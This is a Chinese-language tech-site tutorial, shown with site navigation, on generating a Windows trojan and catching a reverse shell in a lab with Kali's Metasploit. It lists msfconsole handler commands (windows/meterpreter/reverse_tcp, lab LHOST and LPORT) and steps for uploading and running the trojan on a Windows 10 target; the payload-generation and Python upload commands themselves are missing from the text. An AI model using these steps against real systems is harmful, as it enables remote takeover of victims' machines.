| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 系统运维 -> 反弹shell---生成木马反弹shell(Windows) -> 正文阅读 |
|
[系统运维]反弹shell---生成木马反弹shell(Windows) |
一、环境准备 使用到的机器:
使用到的工具: MSF-Metasploit Framework(kali自带) 二、生成木马 使用到的命令:
命令解读:
注意:使用的端口一定是空闲端口,即未被使用的。 运行截图: 三、配置MSF监控 1.启动msf 终端中输入命令:msfconsole 2.载入监控模块 msf中输入命令:use exploit/multi/handler 3.加载payload msf中输入命令:set payload windows/meterpreter/reverse_tcp 4.配置payload msf中输入命令:show options 5.配置payload监控IP msf中输入命令:set LHOST 192.168.230.128 6.配置payload监控端口 msf中输入命令:set LPORT 4567 7.再次查看payload配置 msf中输入命令:show options ? 8.执行监控 msf终端中输入:run 四、攻击利用 1.将木马上传到windows10靶机。 2.在靶机上执行木马。 3.在kali上查看,可以查看到windows10靶机的信息,成功实现反弹shell。 补充---一种上传到靶机的方法: 使用python,命令如下:
?然后在靶机的浏览器中输入监控机的IP地址,如果端口不是80后面加上端口。 例如:192.168.230.128:端口 |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/15 18:02:04- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |